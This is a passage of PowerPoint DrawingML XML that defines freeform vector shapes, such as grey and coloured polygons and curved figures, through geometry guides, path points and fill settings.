                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2E2A04-43B5-4F9D-99DD-F806EE8989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786" y="2625"/>
                    <a:ext cx="45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3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47" name="Freeform 1845">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F35B996C-5557-429D-BE69-A14BADFE91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831" y="2625"/>
                    <a:ext cx="43" cy="322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48" name="Freeform 1846">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56442C8F-B64C-4193-82C8-5DEE3594E3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633" y="2382"/>
                    <a:ext cx="42" cy="325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49" name="Freeform 1847">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5D446A-2CEE-4ABB-B42F-5236D2DCA4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633" y="2394"/>
                    <a:ext cx="42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4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4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50" name="Freeform 1848">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E56936E-F6AC-4AD0-BF81-7A7F0EE648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675" y="2394"/>
                    <a:ext cx="46" cy="322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4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51" name="Freeform 1849">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C5EEED5-8E17-461D-B61D-2F6E45D0AE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786" y="2382"/>
                    <a:ext cx="1190" cy="325"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 321"/>
                      <a:gd name="T1" fmla="*/ 65 h 87"/>
                      <a:gd name="T2" fmla="*/ 160 w 321"/>
                      <a:gd name="T3" fmla="*/ 22 h 87"/>
                      <a:gd name="T4" fmla="*/ 160 w 321"/>
                      <a:gd name="T5" fmla="*/ 22 h 87"/>
                      <a:gd name="T6" fmla="*/ 240 w 321"/>
                      <a:gd name="T7" fmla="*/ 0 h 87"/>
                      <a:gd name="T8" fmla="*/ 321 w 321"/>
                      <a:gd name="T9" fmla="*/ 22 h 87"/>
                      <a:gd name="T10" fmla="*/ 240 w 321"/>
                      <a:gd name="T11" fmla="*/ 44 h 87"/>
                      <a:gd name="T12" fmla="*/ 240 w 321"/>
                      <a:gd name="T13" fmla="*/ 44 h 87"/>
                      <a:gd name="T14" fmla="*/ 81 w 321"/>
                      <a:gd name="T15" fmla="*/ 87 h 87"/>
                      <a:gd name="T16" fmla="*/ 0 w 321"/>
                      <a:gd name="T17" fmla="*/ 65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21" h="87">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="321" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E47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52" name="Freeform 1850">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E6C9A5-45E6-4886-999F-06B4BFF9B21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084" y="2464"/>
                    <a:ext cx="892" cy="285"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 241"/>
                      <a:gd name="T1" fmla="*/ 65 h 77"/>
                      <a:gd name="T2" fmla="*/ 0 w 241"/>
                      <a:gd name="T3" fmla="*/ 77 h 77"/>
                      <a:gd name="T4" fmla="*/ 241 w 241"/>
                      <a:gd name="T5" fmla="*/ 12 h 77"/>
                      <a:gd name="T6" fmla="*/ 241 w 241"/>
                      <a:gd name="T7" fmla="*/ 0 h 77"/>
                      <a:gd name="T8" fmla="*/ 0 w 241"/>
                      <a:gd name="T9" fmla="*/ 65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1" h="77">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="77"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="12"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65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53" name="Freeform 1851">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D299AF3-401B-4171-B2FA-4A67ABDF2F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786" y="2625"/>
                    <a:ext cx="298" cy="124"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 80"/>
                      <a:gd name="T1" fmla="*/ 0 h 34"/>
                      <a:gd name="T2" fmla="*/ 0 w 80"/>
                      <a:gd name="T3" fmla="*/ 13 h 34"/>
                      <a:gd name="T4" fmla="*/ 80 w 80"/>
                      <a:gd name="T5" fmla="*/ 34 h 34"/>
                      <a:gd name="T6" fmla="*/ 80 w 80"/>
                      <a:gd name="T7" fmla="*/ 22 h 34"/>
                      <a:gd name="T8" fmla="*/ 0 w 80"/>
                      <a:gd name="T9" fmla="*/ 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0" h="34">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="13"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="34"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="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27" name="Group 1852">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C81F9F7-6E5B-45F1-BDE6-9450A5D67E2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1516" y="2299"/>
                  <a:ext cx="134" cy="103"/>
                  <a:chOff x="2155" y="1811"/>
                  <a:chExt cx="675" cy="523"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2634" name="Freeform 1853">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4953ED90-4A92-4B10-911D-5A8FA32C36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490" y="1818"/>
                    <a:ext cx="314" cy="433"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4460"/>
                      <a:gd name="T1" fmla="*/ 0 h 6160"/>
                      <a:gd name="T2" fmla="*/ 0 w 4460"/>
                      <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                      <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                      <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                      <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                      <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                      <a:gd name="T8" fmla="*/ 0 w 4460"/>
                      <a:gd name="T9" fmla="*/ 0 h 61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460" h="6160">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="4972"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4460" y="6160"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4460" y="118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969696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35" name="Freeform 1854">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE98BFC-C7A8-461C-87D5-7CC6A8A5B8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513" y="1850"/>
                    <a:ext cx="268" cy="332"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 3803"/>
                      <a:gd name="T1" fmla="*/ 0 h 4725"/>
                      <a:gd name="T2" fmla="*/ 0 w 3803"/>
                      <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                      <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                      <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                      <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                      <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                      <a:gd name="T8" fmla="*/ 0 w 3803"/>
                      <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="3711"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3803" y="4725"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3803" y="101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36" name="Freeform 1855">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E962F1-B4FD-4E8B-A369-B8A0CCA617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490" y="1811"/>
                    <a:ext cx="340" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                      <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                      <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                      <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                      <a:gd name="T4" fmla="*/ 0 w 4831"/>
                      <a:gd name="T5" fmla="*/ 100 h 1288"/>
                      <a:gd name="T6" fmla="*/ 368 w 4831"/>
                      <a:gd name="T7" fmla="*/ 0 h 1288"/>
                      <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                      <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                        <a:moveTo>
                          <a:pt x="4831" y="1189"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4460" y="1288"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="100"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="368" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4831" y="1189"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="B2B2B2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37" name="Freeform 1856">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A702CCB-CF45-40DE-A9FC-5680620945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155" y="2127"/>
                    <a:ext cx="675" cy="181"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 9603"/>
                      <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                      <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                      <a:gd name="T3" fmla="*/ 0 h 2577"/>
                      <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                      <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                      <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                      <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                      <a:gd name="T8" fmla="*/ 0 w 9603"/>
                      <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                        <a:moveTo>
                          <a:pt x="0" y="1287"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4802" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="9603" y="1287"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="2577"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1287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969696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38" name="Freeform 1857">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCCD2E2C-CBEF-4732-98AB-B156F7C92B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493" y="2218"/>
                    <a:ext cx="337" cy="116"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4801"/>
                      <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                      <a:gd name="T2" fmla="*/ 0 w 4801"/>
                      <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                      <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                      <a:gd name="T5" fmla="*/ 369 h 1656"/>
                      <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                      <a:gd name="T7" fmla="*/ 0 h 1656"/>
                      <a:gd name="T8" fmla="*/ 0 w 4801"/>
                      <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                        <a:moveTo>
                          <a:pt x="0" y="1290"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="1656"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4801" y="369"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4801" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1290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C0C0C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39" name="Freeform 1858">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21F13456-235A-4886-BE09-DBD9960D3C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155" y="2218"/>
                    <a:ext cx="338" cy="116"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                      <a:gd name="T2" fmla="*/ 0 w 4802"/>
                      <a:gd name="T3" fmla="*/ 369 h 1656"/>
                      <a:gd name="T4" fmla="*/ 0 w 4802"/>
                      <a:gd name="T5" fmla="*/ 0 h 1656"/>
                      <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                      <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                      <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                        <a:moveTo>
                          <a:pt x="4802" y="1656"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="369"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="1290"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4802" y="1656"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="B2B2B2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40" name="Freeform 1859">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99586FF0-C7E0-47C4-9D27-9D9F4D2735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251" y="2157"/>
                    <a:ext cx="457" cy="122"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 6492"/>
                      <a:gd name="T1" fmla="*/ 654 h 1743"/>
                      <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                      <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                      <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                      <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                      <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                      <a:gd name="T7" fmla="*/ 0 h 1743"/>
                      <a:gd name="T8" fmla="*/ 0 w 6492"/>
                      <a:gd name="T9" fmla="*/ 654 h 17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492" h="1743">
                        <a:moveTo>
                          <a:pt x="0" y="654"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="4061" y="1743"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="6492" y="1091"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="2431" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="654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C0C0C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41" name="Freeform 1860">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46298ED9-5D9F-48DE-8EF1-ABA3526B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804" y="1894"/>
                    <a:ext cx="26" cy="357"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 371"/>
                      <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                      <a:gd name="T2" fmla="*/ 371 w 371"/>
                      <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                      <a:gd name="T4" fmla="*/ 371 w 371"/>
                      <a:gd name="T5" fmla="*/ 0 h 5071"/>
                      <a:gd name="T6" fmla="*/ 0 w 371"/>
                      <a:gd name="T7" fmla="*/ 99 h 5071"/>
                      <a:gd name="T8" fmla="*/ 0 w 371"/>
                      <a:gd name="T9" fmla="*/ 5071 h 50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71" h="5071">
                        <a:moveTo>
                          <a:pt x="0" y="5071"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="371" y="4972"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="371" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="99"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="5071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C0C0C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28" name="Group 1861">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF24AC91-42FA-430A-9A91-53C5C071058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1601" y="2294"/>
                  <a:ext cx="155" cy="241"/>
                  <a:chOff x="2363" y="1132"/>
                  <a:chExt cx="343" cy="529"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2629" name="Freeform 1862">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085BB0F7-2002-455E-8B34-108D176BC7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474" y="1449"/>
                    <a:ext cx="145" cy="189"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 108 w 108"/>
                      <a:gd name="T1" fmla="*/ 36 h 140"/>
                      <a:gd name="T2" fmla="*/ 108 w 108"/>
                      <a:gd name="T3" fmla="*/ 35 h 140"/>
                      <a:gd name="T4" fmla="*/ 108 w 108"/>
                      <a:gd name="T5" fmla="*/ 28 h 140"/>
                      <a:gd name="T6" fmla="*/ 108 w 108"/>
                      <a:gd name="T7" fmla="*/ 23 h 140"/>
                      <a:gd name="T8" fmla="*/ 108 w 108"/>
                      <a:gd name="T9" fmla="*/ 22 h 140"/>
                      <a:gd name="T10" fmla="*/ 108 w 108"/>
                      <a:gd name="T11" fmla="*/ 17 h 140"/>
                      <a:gd name="T12" fmla="*/ 108 w 108"/>
                      <a:gd name="T13" fmla="*/ 16 h 140"/>
                      <a:gd name="T14" fmla="*/ 108 w 108"/>
                      <a:gd name="T15" fmla="*/ 16 h 140"/>
                      <a:gd name="T16" fmla="*/ 89 w 108"/>
                      <a:gd name="T17" fmla="*/ 7 h 140"/>
                      <a:gd name="T18" fmla="*/ 64 w 108"/>
                      <a:gd name="T19" fmla="*/ 2 h 140"/>
                      <a:gd name="T20" fmla="*/ 57 w 108"/>
                      <a:gd name="T21" fmla="*/ 4 h 140"/>
                      <a:gd name="T22" fmla="*/ 49 w 108"/>
                      <a:gd name="T23" fmla="*/ 6 h 140"/>
                      <a:gd name="T24" fmla="*/ 49 w 108"/>
                      <a:gd name="T25" fmla="*/ 6 h 140"/>
                      <a:gd name="T26" fmla="*/ 0 w 108"/>
                      <a:gd name="T27" fmla="*/ 18 h 140"/>
                      <a:gd name="T28" fmla="*/ 29 w 108"/>
                      <a:gd name="T29" fmla="*/ 47 h 140"/>
                      <a:gd name="T30" fmla="*/ 62 w 108"/>
                      <a:gd name="T31" fmla="*/ 40 h 140"/>
                      <a:gd name="T32" fmla="*/ 62 w 108"/>
                      <a:gd name="T33" fmla="*/ 118 h 140"/>
                      <a:gd name="T34" fmla="*/ 101 w 108"/>
                      <a:gd name="T35" fmla="*/ 129 h 140"/>
                      <a:gd name="T36" fmla="*/ 108 w 108"/>
                      <a:gd name="T37" fmla="*/ 117 h 140"/>
                      <a:gd name="T38" fmla="*/ 108 w 108"/>
                      <a:gd name="T39" fmla="*/ 36 h 1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08" h="140">
                        <a:moveTo>
                          <a:pt x="108" y="36"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="36"/>
                          <a:pt x="108" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="33"/>
                          <a:pt x="108" y="30"/>
                          <a:pt x="108" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="28"/>
                          <a:pt x="108" y="26"/>
                          <a:pt x="108" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="23"/>
                          <a:pt x="108" y="22"/>
                          <a:pt x="108" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="21"/>
                          <a:pt x="108" y="19"/>
                          <a:pt x="108" y="17"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="17"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                          <a:pt x="108" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="4"/>
                          <a:pt x="95" y="8"/>
                          <a:pt x="89" y="7"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="6"/>
                          <a:pt x="73" y="0"/>
                          <a:pt x="64" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="3"/>
                          <a:pt x="57" y="4"/>
                          <a:pt x="57" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                          <a:pt x="49" y="6"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                          <a:pt x="0" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                          <a:pt x="29" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                          <a:pt x="62" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="62" y="67"/>
                          <a:pt x="62" y="109"/>
                          <a:pt x="62" y="118"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="63" y="138"/>
                          <a:pt x="89" y="140"/>
                          <a:pt x="101" y="129"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="105" y="126"/>
                          <a:pt x="108" y="122"/>
                          <a:pt x="108" y="117"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="101"/>
                          <a:pt x="107" y="69"/>
                          <a:pt x="108" y="3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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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30" name="Freeform 1863">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14939F82-1AC1-4C89-BA32-F6F5A8C94B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418" y="1435"/>
                    <a:ext cx="267" cy="226"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 196 w 197"/>
                      <a:gd name="T1" fmla="*/ 44 h 167"/>
                      <a:gd name="T2" fmla="*/ 196 w 197"/>
                      <a:gd name="T3" fmla="*/ 37 h 167"/>
                      <a:gd name="T4" fmla="*/ 177 w 197"/>
                      <a:gd name="T5" fmla="*/ 18 h 167"/>
                      <a:gd name="T6" fmla="*/ 137 w 197"/>
                      <a:gd name="T7" fmla="*/ 25 h 167"/>
                      <a:gd name="T8" fmla="*/ 99 w 197"/>
                      <a:gd name="T9" fmla="*/ 35 h 167"/>
                      <a:gd name="T10" fmla="*/ 99 w 197"/>
                      <a:gd name="T11" fmla="*/ 52 h 167"/>
                      <a:gd name="T12" fmla="*/ 99 w 197"/>
                      <a:gd name="T13" fmla="*/ 35 h 167"/>
                      <a:gd name="T14" fmla="*/ 99 w 197"/>
                      <a:gd name="T15" fmla="*/ 35 h 167"/>
                      <a:gd name="T16" fmla="*/ 99 w 197"/>
                      <a:gd name="T17" fmla="*/ 2 h 167"/>
                      <a:gd name="T18" fmla="*/ 89 w 197"/>
                      <a:gd name="T19" fmla="*/ 14 h 167"/>
                      <a:gd name="T20" fmla="*/ 2 w 197"/>
                      <a:gd name="T21" fmla="*/ 8 h 167"/>
                      <a:gd name="T22" fmla="*/ 2 w 197"/>
                      <a:gd name="T23" fmla="*/ 10 h 167"/>
                      <a:gd name="T24" fmla="*/ 2 w 197"/>
                      <a:gd name="T25" fmla="*/ 31 h 167"/>
                      <a:gd name="T26" fmla="*/ 12 w 197"/>
                      <a:gd name="T27" fmla="*/ 67 h 167"/>
                      <a:gd name="T28" fmla="*/ 70 w 197"/>
                      <a:gd name="T29" fmla="*/ 83 h 167"/>
                      <a:gd name="T30" fmla="*/ 83 w 197"/>
                      <a:gd name="T31" fmla="*/ 82 h 167"/>
                      <a:gd name="T32" fmla="*/ 149 w 197"/>
                      <a:gd name="T33" fmla="*/ 65 h 167"/>
                      <a:gd name="T34" fmla="*/ 150 w 197"/>
                      <a:gd name="T35" fmla="*/ 137 h 167"/>
                      <a:gd name="T36" fmla="*/ 150 w 197"/>
                      <a:gd name="T37" fmla="*/ 141 h 167"/>
                      <a:gd name="T38" fmla="*/ 197 w 197"/>
                      <a:gd name="T39" fmla="*/ 140 h 167"/>
                      <a:gd name="T40" fmla="*/ 196 w 197"/>
                      <a:gd name="T41" fmla="*/ 44 h 1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97" h="167">
                        <a:moveTo>
                          <a:pt x="196" y="44"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="44"/>
                          <a:pt x="196" y="40"/>
                          <a:pt x="196" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="193" y="23"/>
                          <a:pt x="183" y="19"/>
                          <a:pt x="177" y="18"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="168" y="17"/>
                          <a:pt x="137" y="25"/>
                          <a:pt x="137" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                          <a:pt x="99" y="52"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                          <a:pt x="99" y="35"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="99" y="20"/>
                          <a:pt x="99" y="4"/>
                          <a:pt x="99" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="98" y="8"/>
                          <a:pt x="95" y="13"/>
                          <a:pt x="89" y="14"/>
                        </a:cubicBezTo>
